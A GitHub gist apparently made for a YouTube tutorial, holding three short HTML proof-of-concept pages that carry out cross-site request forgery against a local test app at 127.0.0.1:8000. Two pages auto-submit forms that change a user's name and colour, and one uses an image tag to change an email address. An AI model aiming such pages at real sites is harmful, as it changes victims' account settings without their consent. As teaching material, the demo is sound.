Skip to content

Instantly share code, notes, and snippets.

@InsiderPhD

InsiderPhD/csrf-attack_csrf.html

Last active March 12, 2024 08:49
Show Gist options
  • Save InsiderPhD/eddbe914467a092e13b6ec1d98b210e7 to your computer and use it in GitHub Desktop.
Save InsiderPhD/eddbe914467a092e13b6ec1d98b210e7 to your computer and use it in GitHub Desktop.
Download ZIP
CSRF PoC Example for YT
Raw
csrf-attack_csrf.html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Title</title>
</head>
<body>
<form id = "csrf_form" method = "POST" action = "http://127.0.0.1:8000/user/name">
<input type = "text" name = "name" value = "hhh">
<form>
<script>
document.getElementById('csrf_form').submit();
</script>
</body>
</html>
Raw
csrf-attack_get.html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Title</title>
</head>
<body>
<img src="http://127.0.0.1:8000/user/email?email=sdds%40sds.com"/>
</body>
</html>
Raw
csrf-attack_post.html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Title</title>
</head>
<body>
<form id = "csrf_form" method = "POST" action = "http://127.0.0.1:8000/user/colour">
<input type = "text" name = "colour" value = "pink">
<form>
<script>
document.getElementById('csrf_form').submit();
</script>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment